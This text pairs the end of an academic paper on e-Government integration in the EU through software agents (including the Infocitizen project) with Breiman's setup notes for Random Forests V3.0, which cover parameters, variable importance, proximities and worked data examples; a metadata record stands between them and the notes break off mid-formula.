the openness of the market. Additionally, an attractive place for jobs requires assuring the unrestricted mobility of the workforce. Unfortunately, the European market’s openness is far behind the traditional freedom of market in the USA, where all 50 states, which can be perceived as analogical to 29 European Economic Area countries, are under the single federal jurisdiction, use the same currency and speak the same language. Achieving business’ and citizens’ mobility comparable to the USA is a challenge for European countries. To provide such functionality and to protect countries’ sovereignty at the same time, governments and administration structures of all countries must closely cooperate. However, the cooperation and fast as well as errorless information exchange would not be possible without applying advanced Information Technology (IT) solutions. Moreover, competing with the USA in the field of becoming the most competitive knowledge based economy of the world is possible only when the integration level of IT infrastructures of all member states will be sufficiently high [1,2]. Usefulness of IT in supporting administrative tasks is closely bonded with citizens’ ability to deal with e-solutions. In the last years citizens e-literacy is growing up around the world. Applying electronic solutions requires citizens to put more trust in their governments, on the other hand IT solutions give more control over the government’s actions to citizens. The efficiency of the e-Government can be improved by raising the overall level of education and computer literacy as well as with the development of the appropriate infrastructure [3]. 2. Decentralisation of the government Decentralising government competences arises from the European Treaty and is aligned with the European Union’s strategy. A country’s law shall guarantee local governments all means necessary to perform their duties. The preamble of the European Charter of Local Self-Governments [4] states: “Considering that the local authorities are one of the main foundations of any democratic regime; Considering that the right of citizens to participate in the conduct of public affairs is one of the democratic principles that are shared by all member States of the Council of Europe; Considering that it is at the local level that this right can be most directly exercised;". The document was ratified by 43 countries at the end of the year 2007\(^2\). Reorganisation of a country’s administrative structure from the central managed structure into the self-governed one was done in Poland in the beginning of democratic reforms. The reorganisation is considered successful and it improved Poland’s management especially in the area of European financial aid, which became noticeable shortly before and after accession of Poland to the EU. Local governments improved the success ratio in accepting EU Structural and Consistency Funds. In the EU the companies are not the only ones who compete between each other. Public agencies, governments, regions, cities compete as well. On the other hand, when a country enters the EU structures, it is bonded by a new set of regulations. Government institutions at the same time compete and cooperate with those in the entire Europe [5]. Moreover, the increased competition between regions is accompanied by the increased mobility of citizens and businesses. Mobile workers are willing to travel to any place to get their dream job. The mobility is embraced by the European Union as a factor which improves the joint European economy’s competitiveness. Therefore new services required by citizens and existing services should respond to the increased mobility of citizens. The main issue of citizens’ migrations is lack of consistent information exchange architecture/infrastructure. Institutions use their own systems, which are often incompatible within one country not to mention automated cross-border information exchange. Removing physical borders (on 21.12.2007 the Schengen zone grew to 22 countries) is not accompanied by removing administrative ones. Centralisation of administrative tasks is impossible from the technological and organisational points of view. Furthermore, it is against the European philosophy of moving the governance closer to people. Finally, centralisation of some tasks can be considered as an attempt on a country’s sovereignty. Hence, other means of providing citizens with consistent European-wide administration shall be developed. European countries which reached some advance in developing the e-Government infrastructure developed sets of best practices and interoperability frameworks for that area. These attempts were noticed by the European community and the European Interoperability Framework [6] was created. Introducing e-Government initiatives at the local level shifts the power from public managers to citizens and businesses. The approach presented in [7] suggests at first shaping e-government initiatives by public managers employed \(^1\)Source: [4] \(^2\)http://conventions.coe.int/treaty/Commun/QueVoulezVous.asp?NT=122&CL=ENG by government agencies and afterwards giving more control to local societies. The customers, in the case of the government – citizens and businesses, shall decide what level of technological advancement is necessary to achieve their goals. The paper warns against projecting citizens’ or businesses’ expectations directly on the e-Government structure. Their expectations can often have a very complex and indirect influence on desired e-Government functionalities. 3. Local resources for citizens and businesses Each country possesses specific material and not material resources. There are various statistics of countries resources’ allocations, however, these statistics do not show the real availability of particular resources in particular places. The central government of a country is too far and too concerned with the big picture to micromanage resources at the local level. Making resources available to companies is the task of specialised government agencies, in the case of Poland these agencies are PAIIiIZ³ (winning and supporting foreign investments) and PARP⁴ (supporting domestic small and medium enterprises). However, these agencies do not own any resources but they contact local governments to ask them for the availability of the resources. This approach makes the process less flexible and more time consuming. Electronic and automated workflow should be introduced to make providing potential investors with resources more efficient. Despite the growing understanding of the role of the internet in the communication with businesses, using e-Government technologies as a competitive factor of regions is yet to be discovered. Local governments are closer to local societies and can listen to their needs. They also have access to more accurate information about the environment and available resources. The local government knows the detailed structure of the demographic profile of the society, therefore it can conclude what type of companies could benefit most for the region. For example, when the society is young and educated, the local administration should attract research facilities or high tech companies which can utilise locally available workforce. The main driver of all businesses is to maximise the profit. Outsourcing of various processes gained significant attention in the last years. Companies are moving their production to countries where costs of manufacturing or providing services is lower. However, it is not rare that a cost-effective operation meets obstacles in the form of a huge amount of administrative paperwork to fulfil. Doing accounting for an investment in a foreign country often requires hiring a consulting company or funding a shell company in a target country. The ³http://www.paiz.gov.pl/ ⁴http://www.parp.gov.pl/ additional effort is required because operations in every country are subjected to different jurisdictions and are considered as separate ventures. The additional paperwork creates additional costs. The availability of government services in Internet evolves and can be divided into phases starting with (1) an initial presence of an institution marked by a simple website with basic information. In further stages the government heads to (2) extending the presence by adding dynamic information, (3) adding interactivity (downloadable forms, gathering feedback) and finally to (4) the transactional level when citizens can use remote connection to initiate transactions, which literally leads to a virtual visit to an institution’s branch by interacting with its website. Advancing the interaction level between citizens and the government is accompanied by integrating services from different levels of the government (vertical integration) and by integrating complementary services from different sources (horizontal integration). The final and the most evolved level of the government is the full integration of all services at the country’s level. In such a scenario a citizen can access all services from a single website (one-stop-shop), where he or she uses a unique identification name and password (single-log-on) to perform all operations regardless of their origin and to have all fees put on a single consolidated bill. The information exchange between all institutions is integrated both at the presentation layer (from the citizen’s point of view) and at the business logic layer (from the institution’s point of view) [7]. The issue which makes vertical integration more difficult is the slower progress of the development of electronic services by authorities at the local level. Even in countries with highly developed services at the country’s level, the local level is strongly underdeveloped. The situation is better in bigger cities which discovered the potential of electronic access channels earlier than smaller communities. Furthermore, services for businesses tend to be developed in the first place as the more friendly business environment gets more investments in the region. Creating e-Government services at any level is a good start for the propagation of the idea to other levels. Once citizens get acquainted with a service in one institution, they will demand it from other agencies. The same rule applies to agencies, when a decision maker sees how other agency benefits from a particular service, he embraces creating the same service for his institution [7]. 4. Applying software agents 4.1. The idea of an agent localising administration units The software agents paradigm describes the approach to mobile computing, where mobile code is executed on various host systems. The four main characteristics of a software agent can be distinguished [8]: - Intelligence – ability to adapt to changing working environment, - Cooperative behaviour – negotiating and sharing knowledge with other agents, - Autonomy – performing specified tasks without any interaction from the user, - Mobility – ability to transfer to another host system. More vague definitions describe agency and software agency as reacting to data received from sensors, acting on user’s behalf by software entities or acting independently in a dynamic environment [9]. Software agents are being applied to various operations which mainly include information gathering and filtering, and decision making. A carefully designed set of such actions creates an e-commerce flow, including: product brokering, merchant brokering, price negotiations and arranging additional services. The most common application of software agents is supporting Business-to-Customer (B2C) relations by providing customers with “shop bots” and “auction bots” (more in [10]). Although these solutions can be applied for Business-to-Business (B2B) relations as well, dealing with enterprise interaction requires more sophisticated tools. Multi-attribute and multi-subject auctions, contract negotiations and Supply Chain Management (SCM) require dedicated solutions to help companies with achieving the best return from each spent monetary unit. A distinguishable family of negotiating software agents was designed as the answer to businesses needs. The strongest advantage of using software agents, which are able to embed their code into a remote system, is the data mining ability [10]. Software agents can be applied to integrate government services both horizontally and vertically. The agent can localise the appropriate institution according to the given task and perform all the necessary information exchange with it. Moreover, the agent can design and execute automatically the whole chain of operations between multiple organisations to perform a cross-border operation. An automated, distributed e-Government applications architecture was proposed in [11]. The architecture uses web services, workflow specifications and software agents to automate one of the Finnish government’s business processes. A certain level of flexibility is achieved by utilising Business Process Execution Language (BPEL) and the software agents technology. A software agent dynamically creates a workflow process for each service call using available services description. A different approach was suggested in [12], where the Web Digital Government (WebDG) Web Services Management System was introduced. The WebDG utilises a central repository architecture for government services. The system creates a dedicated service for each request made by a citizen. The purpose of such an architecture is to achieve the highest Quality of Service (QoS). Software agents can be applied to customised e-Government services where a set of user profiles is created and an agent associates a profile with a citizen requesting the service. Such an approach can be used to create personalised services for citizens. Such an approach should result in the gain of approval for the administration initiatives. The User Agent associated with a citizen makes an inquiry to the Service Manager Agent for services which may be interesting for the user associated with the User Agent. Services are chosen according to data in profiles stored in the User Profile Database. Profiles consist of demographic data [13]. 4.2. The Infocitizen project The unlimited mobility of people and businesses is one of the foundations of the EU. The Infocitizen project addresses that mobility in the area of peoples migrations. The purpose of the Infocitizen is to use software agents to perform all registration duties required during citizens’ migrations. The goal of the project is to allow citizens to contact only the office in the destination country, so he or she is not required to carry on any additional documents from his or her home country. The only document which is sufficient for all purposes is the identification card [14]. The described idea suits the EU policy of removing all barriers for the unrestricted mobility. With the Infocitizen project, all citizens can access any service concerning their registration duties from any place. The project consisted of designing a software agent architecture for local administrative units providing citizens’ registration services [14]. The unrestricted mobility is defined as an ability to perform all activities in any place within the EU, just as it would be done in the home country. All documentations related to citizens’ birth, changing marital status, birth of a child, adopting a child, registering a new residence, taking a job could be filled in any appropriate office participating in the information exchange (presumably any public service office in the EU). The scope of the project covers providing services by public administration, requesting services by citizens and interaction between a citizen and public administration units. The whole process is coordinated by the Infocitizen agent. The process of citizens migration involves communicating with the citizen’s regional office to update his status. More complicated tasks are for example: marriage and adopting a child. In the case of marriage, offices of both spouses shall be queried about the marital status and the status shall be updated with the new information [14]. The Infocitizen’s technical architecture is based on the JAVA environment. The architecture is based on utilising a set of services. The services are combined at run-time when a business action is triggered [15]. ![UML Sketch of the Architecture](image) Fig. 1. Logical structure of the Infocitizen architecture [15] The technical architecture of the Infocitizen is organised in the following way: each public administration unit has its own InfoCitizen Service Interface running on its own IT infrastructure, the InfoCitizen Interoperability Agent is the central component of the InfoCitizen Platform. Agents are utilized on “as-needed” basis. Several agents can exist within the architecture. The structure of software components of the Infocitizen architecture is shown in Fig. 1. An administrative unit requests a service from an agent. The agent who responds to the request carries out all tasks, including getting any additional input from the citizen or administrative employee. The other components are: the services repository, the interface between the agent infrastructure and legacy systems in administration offices, and maintenance and development components [16]. 4.3. Aiding interactions between governments and businesses Relations between governments (or local governments) and business can be considered twofold [17]: 1) a company is a subject of administrative responsibilities (G2B relation), 2) multiple governments (or local governments) compete to make a company invest on their soil (B2G relation). Applying a software agent to act as a proxy who contacts all regions to gather necessary information for a company would benefit both the company and the whole business environment. Companies can make their decision based on accurate and exhaustive data and local societies can compete between each other by making their regions more attractive for businesses. Local governments can even create coalitions with neighbouring societies from different countries to gain an attractive investor for the region. The “Euroregion”\(^5\) initiative is an example of cross-border cooperation of local governments within the EU. With software agents interactions between companies and local governments/societies can be independent of the administrative borders and of information systems frames. An agent can seek necessary resources in a heterogeneous environment. **Conclusions** Trying to integrate already decentralised administration structure would be a step back in the effort of making citizens’ and businesses’ flows easier. Applying an agent-ready framework, where citizens and businesses can set up a software agent to make their inquiries or perform their tasks is a compromise between the total centralisation and the autonomy of every country in managing their own systems. The most efficient vision of the government of the future is the vision of a single website where citizens and companies from any country belonging to a community (the European Union in the case of Europe) can do all government-related tasks regardless of their localisation and formal registration. The website should be accompanied by a single toll-free number where call-centre consultants can assist the user in solving all issues. The rules which apply to customer services in the government are not different from those which apply to businesses, as citizens are used to the customer service provided by businesses. Considering government services from the angle of the three-tier software model, the single website (one-stop-shop) should provide integration of all government services at the presentation layer. User input shall be converted to a common data model for an agent which creates a task based on the provided data. Enabling more services in the manner applied in the Infocitizen project allows to achieve the desired interoperability level with preserving the autonomy off all countries in designing their administration. If the EU makes a requirement of extending all services to support the software agents infrastructure, countries can develop e-Government services according to their own visions constrained only by the single condition of the agent enablement. A software agent can take over the role of an institution whose duty is to support companies when investing in a country. The agent can search for the best source of requested resources regardless of the country, which will enable internal competition and create a strong motivation to improve the business environment. The agent can perform the matchmaking of companies and regions \(^5\)http://www.pomerania.net/ in order to achieve maximal synergetic effect or proper alignment. Maximising properties of individual regions creates a bottom-up effect on the economic growth of the joined European economic space. References
{"Source-Url": "https://journals.umcs.pl/ai/article/download/3236/2432", "len_cl100k_base": 4352, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 21881, "total-output-tokens": 5691, "length": "2e12", "weborganizer": {"__label__adult": 0.0004925727844238281, "__label__art_design": 0.0012655258178710938, "__label__crime_law": 0.0022125244140625, "__label__education_jobs": 0.004673004150390625, "__label__entertainment": 0.0002386569976806641, "__label__fashion_beauty": 0.0003104209899902344, "__label__finance_business": 0.0307769775390625, "__label__food_dining": 0.0005631446838378906, "__label__games": 0.0015735626220703125, "__label__hardware": 0.0012388229370117188, "__label__health": 0.0007257461547851562, "__label__history": 0.0016231536865234375, "__label__home_hobbies": 0.00021779537200927737, "__label__industrial": 0.0012331008911132812, "__label__literature": 0.0006031990051269531, "__label__politics": 0.0272674560546875, "__label__religion": 0.000598907470703125, "__label__science_tech": 0.06707763671875, "__label__social_life": 0.0004601478576660156, "__label__software": 0.1949462890625, "__label__software_dev": 0.6591796875, "__label__sports_fitness": 0.0003287792205810547, "__label__transportation": 0.001590728759765625, "__label__travel": 0.0006918907165527344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 27063, 0.02081]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 27063, 0.39937]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 27063, 0.92825]], "google_gemma-3-12b-it_contains_pii": [[0, 2343, false], [2343, 5225, null], [5225, 8014, null], [8014, 10803, null], [10803, 13696, null], [13696, 16417, null], [16417, 19154, null], [19154, 20910, null], [20910, 23768, null], [23768, 27063, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2343, true], [2343, 5225, null], [5225, 8014, null], [8014, 10803, null], [10803, 13696, null], [13696, 16417, null], [16417, 19154, null], [19154, 20910, null], [20910, 23768, null], [23768, 27063, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 27063, null]], "pdf_page_numbers": [[0, 2343, 1], [2343, 5225, 2], [5225, 8014, 3], [8014, 10803, 4], [10803, 13696, 5], [13696, 16417, 6], [16417, 19154, 7], [19154, 20910, 8], [20910, 23768, 9], [23768, 27063, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 27063, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
7025a8907b1ab001adee982dc2d630b840404fba
Notes On Setting Up, Using, And Understanding Random Forests V3.0 The V3.0 version of random forests contains some modifications and major additions to Version 2.2. It deletes some portions, like the density estimation procedure, which I found unreliable, and fixes a flaw in version 2. I apologize in advance for all bugs and would like to hear about them. To find out how this program works, read my paper "Random Forests-Random Features". It's available as a technical report if you go back to my department home page (www.stat.berkeley.edu) and click on technical reports. It will be published soon in the Machine Learning Journal. The program is written in extended Fortran 77 making use of a number of VAX extensions. It runs on SUN workstations f77 and on Absoft Fortran 77 (available for Windows) and on the free g77 compiler, but may have hang ups on other f77 compilers. If you find such problems and fixes for them, please let me know. Random forests does classification computes principal coordinates to use as variables. variable importance (in a number of ways) computes proximity measures between cases computes scaling displays for the data gives a measure of outlyingness for each case The last three can be done for the unsupervised case i.e. no class labels. I have used proximities to cluster data and they seem to do a reasonable job. The new addition uses the proximities to do metric scaling of the data. The resulting pictures of the data are often useful. The first part of these notes contains instructions on how to set up a run of random forests. The second part contains the notes on the features of random forests and how they work. I. Setting Parameters The first seven lines following the parameter statement need to be filled in by the user. **Line 1 Describing The Data** **mdim0**=number of variables **nsample0**=number of cases (examples or instances) in the data **nclass**=number of classes **maxcat**=the largest number of values assumed by a categorical variable in the data **ntest**=the number of cases in the test set. NOTE: Put ntest=1 if there is no test set. Putting ntest=0 may cause compiler complaints. **labels**=0 if the test set has no class labels, 1 if the test set has class labels. If there are no categorical variables in the data set maxcat=1. If there are categorical variables, the number of categories assumed by each categorical variable has to be specified in an integer vector called cat, i.e. setting cat(5)=7 implies that the 5th variable is a categorical with 7 values. If maxcat=1, the values of cat are automatically set equal to one. If not, the user must fill in the values of cat in the early lines of code. For a J-class problem, random forests expects the classes to be numbered 1,2, ...,J. For an L valued categorical, it expects the values to be numbered 1,2, ... ,L. At present, L must be less than or equal to 32. A test set can have two purposes--first: to check the accuracy of RF on a test set. The error rate given by the internal estimate will be very close to the test set error unless the test set is drawn from a different distribution. Second: to get predicted classes for a set of data with unknown class labels. In both cases the test set must have the same format as the training set. If there is no class label for the test set, assign each case in the test set label class #1, i.e. put cl(n)=1, and set labels=0. Else set labels=1. **Line 2 Setting Up The Run** **mtry**=number of variables randomly selected at each node **jbt**=number of trees to grow look=how often you want to check the prediction error ipi=set priors indsize=minimum node size **mtry:** this is the only parameter that requires some judgment to set, but forests isn't too sensitive to its value as long as it's in the right ball park. I have found that setting mtry equal to the square root of mdim gives generally near optimum results. My advice is to begin with this value and try a value twice as high and half as low monitoring the results by setting look=1 and checking the internal test set error for a small number of trees. With many noise variables present, mtry has to be set higher. **jbt:** this is the number of trees to be grown in the run. Don't be stingy--random forests produces trees very rapidly, and it does not hurt to put in a large number of trees. If you want auxiliary information like variable importance or proximities grow a lot of trees--say a 1000 or more. Sometimes, I run out to 5000 trees if there are many variables and I want the variables importances to be stable. **look:** random forests carries along an internal estimate of the test set error as the trees are being grown. This estimate is outputted to the screen every look trees. Setting look=10, for example, gives the internal error output every tenth tree added. If there is a labeled test set, it also gives the test set error. Setting look=jbt+1 eliminates the output. Do not be dismayed to see the error rates fluttering around slightly as more trees are added. Their behavior is analagous to the sequence of averages of the number of heads in tossing a coin. **ipi:** pi is an real-valued vector of length nclass which sets prior probabilities for classes.ipi=0 sets these priors equal to the class proportions. If the class proportions are very unbalanced, you may want to put larger priors on the smaller classes. If different weightings are desired, set ipi=0 and specify the values of the \{pi(j)\} early in the code. These values are later normalized, so setting pi(1)=1, pi(2)=2 implies that the probability of seeing a class 2 instance is twice as large as that of seeing a class 1 instance. **ndsize**: setting this to the value $k$ means that node node fewer than $k$ cases will be split. The default that always gives good performances is $\text{ndsize}=1$. On large data sets, memory will be preserved and speed enhanced if ndsize is set larger. Usually, this results in only a negligible loss of accuracy. **Line 3 Variables to Include** This option is included as a matter of convenience. I coded it when searching to find which variables were "important". To use this option the data must be read in as $x_0(mdim0,nsample)$ instead of $x(mdim, nsample)$. The values of the $\text{msel}$ variable have to be set. **ivarin**: only those variables for which $\text{msel} = 1$ will be used in prediction. **inarout**: only those variables for which $\text{msel} \neq 1$ will be used in prediction. **Line 4 Options** **imp** = 1 turns on the variable importances method described below. **iprox** = 1 turns on the computation of the intrinsic proximity measures between any two cases. **iaddcl** = 1 If the data is without labels (i.e. unsupervised data) then iaddcl = 1 labels this data class #1 and generates a synthetic data set of the same size which is labeled class #2. The synthetic data is sampled independently from the marginals of the original data. **noutlier** = 1 computes an outlyingness measure for all cases in the data. If this is on, then iprox must also be switched to one. If iaddcl=1 then the outlyingness measure is computed only for the original data. **Line 5 Scaling** **iscale** = 1 turns on the scaling and extracts the scaling coordinates from the proximities. iprox=1 is necessary. If iaddcl=1, then the scaling is outputted only for the original data. **msdim** is the number of scaling coordinates to output. Generally, 4-5 are more than sufficient. **Line 6 Transform to Principal Coordinates** **ipc=1** takes the x-values and computes principal coordinates from the covariance matrix of the x's. These will be the new variables for RF to operate on. This will not work right if some of the variables are categorical. **mdimpc:** This is the number of principal components to extract. It has to be <=mdim. **norm=1** normalizes all of the variables to mean zero and sd one before computing the principal components. **Line 7 Output Controls** Note: user must supply file names for all output listed below or send it to the screen. **nsumout=1** writes out summary data to the screen. This includes errors rates and the confusion matrix. **infout=1** prints the following columns to a file i) case number ii) 1 if predicted class differs from true class, 0 else iii) true class label iv) predicted class label v) margin=true class prob. minus the max of the other class prob. vi)-vi+nclass) class probabilities **ntestout=1** prints the following columns to a file i) case number in test set ii) true class (true class=1 if data is unlabeled) iii) predicted class iv)-iv+nclass) class probabilities **imp=1** prints the following columns to a file i) variable number variables importances computed as: ii) The % rise in error over the baseline error. iii) 100* the change in the margins averaged over all cases iv) The proportion of cases for which the margin is decreased minus the proportion of increases. v) The gini increase by variable for the run \[ \text{impsetout}=1 \text{ prints out for each case the following columns:} \\ \text{i) case number} \\ \text{ii) margin for the case} \\ \text{iii - iii+mdim) altered margin due to noising up mth variable.} \] \[ \text{iproxout}=1 \text{ prints to file} \\ i) case #1 number \\ i) case #2 number \\ i) proximity between case #1 and case #2 \] \[ \text{iscale}=1 \text{ prints out the following columns:} \\ i) case number \\ i) true class \\ i) predicted class. \\ i) 0 if ii)=iii), 1 otherwise \\ i) scaling coordinates \] \[ \text{noutlier}=1 \text{ prints the following columns to a file} \\ i) sequence number \\ i) class \\ i) case number \\ i) outlyingness measure \] USER WORK: The user has to construct the read-in the data code of which I have left an example. This needs to be done after the dimensioning of arrays. If maxcat >0 then the categorical values need to be filled in. If ipi=0, the user needs to specify the relative probabilities of the classes. REMARKS: The proximities can be used in the clustering program of your choice. Their advantage is that they are intrinsic rather than an ad hoc measure. I have used them in some standard and home-brew clustering programs and gotten reasonable results. The proximities between class 1 cases in the unsupervised situation can be used to cluster. Extracting the scaling coordinates from the proximities and plotting scaling coordinate $i$ versus scaling coordinate $j$ gives illuminating pictures of the data. Usually, $i=1$ and $j=2$ give the most information (see the notes below). There are four measures of variable importance: They complement each other. Except for the 4th they are based on the test sets left out on each tree construction. On a microarray data with 5000 variables and less than 100 cases, the different measures single out much the same variables (see notes below). But I have found one synthetic data set where the 3rd measure was more sensitive than the first three. Sometimes, finding the effective variables requires some hunting. If the effective variables are clear-cut, then the first measure will find them. But if the number of variables is large compared to the number of cases, and if the predictive power of the individual variables is small, the other measures can be useful. Random forests does not overfit. You can run as many trees as you want. Also, It is fast. Running on a 250mhz machine, the current version using a training set with 800 cases, 8 variables, and $mtry=1$, constructs each tree in .1 seconds. On a training set with 2200 cases, 11 variables, and $mtry=3$, each tree is constructed in .2 seconds. It takes 6 seconds per tree on a training set with 15000 cases and 16 variables with $mtry=4$, while also making computations for a 5000 member test set. The present version of random forests does not handle missing values. A future version will. It is up to the user to decided how to deal with these. My current preferred method is to replace each missing value by the median of its column. My impression is that because of the randomness and the many trees grown, filling in missing values with a sensible values does not effect accuracy much. For large data sets, if proximities are not required, the major memory requirement is the storage of the data itself, and the three integer arrays $a, at, b$. If there are less than 64,000 cases, these latter three may be declared integer*2 (non-negative). Then the total storage requirement is about three times the size of the data set. If proximities are calculated, storage requirements go up by the square of the number of cases times eight bytes (double precision). Outline Of How Random Forests Works Usual Tree Construction--Cart Node=subset of data. The root node contains all data. At each node, search through all variables to find best split into two children nodes. Split all the way down and then prune tree up to get minimal test set error. Random Forests Construction Root node contains a bootstrap sample of data of same size as original data. A different bootstrap sample for each tree to be grown. An integer K is fixed, K<<number of variables. K is the only parameter that needs to be specified. Default is the square root of number of variables. At each node, K of the variables are selected at random. Only these variables are searched through for the best split. The largest tree possible is grown and is not pruned. The forest consists of N trees. To classify a new object having coordinates \( x \), put \( x \) down each of the N trees. Each tree gives a classification for \( x \). The forest chooses that classification having the most out of N votes. Transformation to Principal Coordinates One of the users lent us a data set in which the use of a few principal components as variables reduced the error rate by 2/3rds. On experimenting, a few other data sets were found where the error rate was significantly reduced by pre-transforming to principal coordinates As a convenience to users, a pre- transformation subroutine was incorporated into this version. **Random Forests Tools** The design of random forests is to give the user a good deal of information about the data besides an accurate prediction. Much of this information comes from using the "out-of-bag" cases in the training set that have been left out of the bootstrapped training set. The information includes: a) **Test set error rate.** b) **Variable importance measures** c) **Intrinsic proximities between cases** d) **Scaling coordinates based on the proximities** e) **Outlier detection** I will explain how these function and give applications, both for labeled and unlabeled data. --- **Test Set Error Rate** In random forests, there is no need for cross-validation or a separate test set to get an unbiased estimate of the test set error. It is gotten internally, during the run, as follows: Each tree is constructed using a different bootstrap sample from the original data. About one-third of the cases are left out of the bootstrap sample and not used in the construction of the kth tree. **Test Set Error Rate** Put each case left out in the construction of the kth tree down the kth tree to get a classification. In this way, a test set classification is gotten for each case in about one-third of the trees. Let the final test set classification of the forest be the class having the most votes. Comparing this classification with the class label present in the data gives an estimate of the test set error. **Variable Importance.** Because of the need to know which variables are important in the classification, random forests has four different ways of looking at variable importance. Sometimes influential variables are hard to spot--using these four measures provides more information. **Measure 1** To estimate the importance of the mth variable. In the left-out cases for the kth tree, randomly permute all values of the mth variable. Put these new covariate values down the tree and get classifications. Proceed as though computing a new internal error rate. The amount by which this new error exceeds the original test set error is defined as the importance of the mth variable. **Measures 2 and 3** For the nth case in the data, its margin at the end of a run is the proportion of votes for its true class minus the maximum of the proportion of votes for each of the other classes. The 2nd measure of importance of the mth variable is the average lowering of the margin across all cases when the mth variable is randomly permuted as in method 1. The third measure is the count of how many margins are lowered minus the number of margins raised. **Measure 4** The splitting criterion used in RF is the gini criterion--also used in CART. At every split on of the mtry variables is used to form the split and there is a resulting decrease in the gini. The sum of all decreases in the forest due to a given variable, normalized by the number of trees, forms measure 4. Additional Case-Wise Information. For the mth variable, the values of all of the margins in the training set with the mth variable noised up is computed. When the graph of these values is compared to the graph of the original margins, interesting information about individual cases often emerges. To illustrate the use of this information by some examples. Some of these were done on version 1 so may differ somewhat from the version 3 output. An Example--Hepatitis Data Data: survival or non survival of 155 hepatitis patients with 19 covariates. Analyzed by Diaconis and Efron in 1983 Scientific American. The original Stanford Medical School analysis concluded that the important variables were numbers 6, 12, 14, 19. Efron and Diaconis drew 500 bootstrap samples from the original data set and used a similar procedure, including logistic regression, to isolate the important variables in each bootstrapped data set. Their conclusion, "Of the four variables originally selected not one was selected in more than 60 percent of the samples. Hence the variables identified in the original analysis cannot be taken too seriously." Logistic Regression Analysis Error rate for logistic regression is 17.4%. Variables importance is based on absolute values of the coefficients of the variables divided by their standard deviations. The conclusion is that variables 7 and 11 are the most important covariates. When logistic regression is run using only these two variables, the cross-validated error rate rises to 22.9%. **Analysis Using Random Forests** The error rate is 12.3%--30% reduction from the logistic regression error. Variable importances (measure 1) are graphed below: Two variables are singled out—the 12th and the 17th. The test set error rates running 12 and 17 alone were 14.3% each. Running both together did no better. Virtually all of the predictive capability is provided by a single variable, either 12 or 17. (they are highly correlated) The standard procedure when fitting data models such as logistic regression is to delete variables; Diaconis and Efron (1983) state, "...statistical experience suggests that it is unwise to fit a model that depends on 19 variables with only 155 data points available." Newer methods in Machine Learning thrive on variables—the more the better. There is no need for variable selection. On a sonar data set with 208 cases and 60 variables, Random Forests error rate is 14%. Logistic Regression has a 50% error rate. **Microarray Analysis** Random forests was run on a microarray lymphoma data set with three classes, sample size of 81 and 4682 variables (genes) without any variable selection. The error rate was low (1.2%) using mtry=150. What was also interesting from a scientific viewpoint was an estimate of the importance of each of the 4682 genes. The graphs below were produced by a run of random forests. The graphs show that measure 1 has the last sensitivity, showing only one significant variable. Measure 2 has more, showing not only the activity around the gene singled out by measure 1 but also a secondary burst of activity higher up. Measure 3 has too much sensitivity, fingering too many variables. **Class probability estimates** At run's end, for each case there is an out-of-bag estimate of the probability that it is in each one of the J classes. This estimate is given by the proportion of votes for each class. For each member of a test set (with or without class labels), these probabilities are also estimated. **An Astronomical Example:** Bob Becker allowed the use of his quasar data set of 2000 astronomical objects of which about half have been verified as quasars. Verification is expensive, but there are some variables that are cheap to measure. Using these cheap variables the data set was run through random forests and for each case a probability $P_Q(n)$ outputted that was a probability that the nth case was a quasar. There is also an unverified test set which we ran through that assigned a probability $PQ(n)$ to the $n$th case in the test set. Telescope time is valuable--the question is: Given an estimate of $PQ$ for a stellar object, should verification be undertaken. An answer is provided by the training set. For instance, if all objects with $PQ > .9$ are verified, then about 95% of them will be quasars. An intrinsic proximity measure Since an individual tree is unpruned, the terminal nodes will contain only a small number of instances. Run all cases in the training set down the tree. If case i and case j both land in the same terminal node, increase the proximity between i and j by one. At the end of the run, the proximities are divided by twice the number of trees in the run and proximity between a case and itself set equal to one. To cluster-use the above proximity measures. Example-Bupa Liver Disorders This is a two-class biomedical data set consisting of the covariates 1. mcv mean corpuscular volume 2. alkphos alkaline phosphotase 3. sgpt alamine aminotransferase 4. sgot aspartate aminotransferase 5. gammagt gamma-glutamyl transpeptidase 6. drinks number of half-pint equivalents of alcoholic beverage drunk per day The first five attributes are the results of blood tests thought to be related to liver functioning. The 345 patients are classified into two classes by the severity of their liver disorders. The misclassification error rate is 28% in a Random Forests run. What can we learn about this data? A) Variable Importance (method 1) ![Figure 2: Variable Importance - BUPA Liver](image) Blood tests 3 and 5 are the most important, followed by test 4. B) Clustering Using the proximity measure outputted by Random Forests to cluster, there are two class #2 clusters. In each of these clusters, the average of each variable is computed and plotted: Something interesting emerges. The class two subjects consist of two distinct groups: Those that have high scores on blood tests 3, 4, and 5 Those that have low scores on those tests. We will revisit this example below. **Scaling Coordinates** The proximities between cases n and k form a matrix \{prox(n,k)\}. From their definition, it is easy to show that this matrix is symmetric, positive definite and bounded above by 1, with the diagonal elements equal to 1. It follows that the values 1-prox(n,k) are squared distances in a Euclidean space of dimension not greater than the number of cases. For more background on scaling see "Multidimensional Scaling" by T.F. Cox and M.A. Cox Let \(prox(n,-)\) be the average of \(prox(n,k)\) over the 2nd coordinate. and \(prox(-,-)\) the average over both coordinates. Then the matrix: \[ \text{cv}((n,k) = 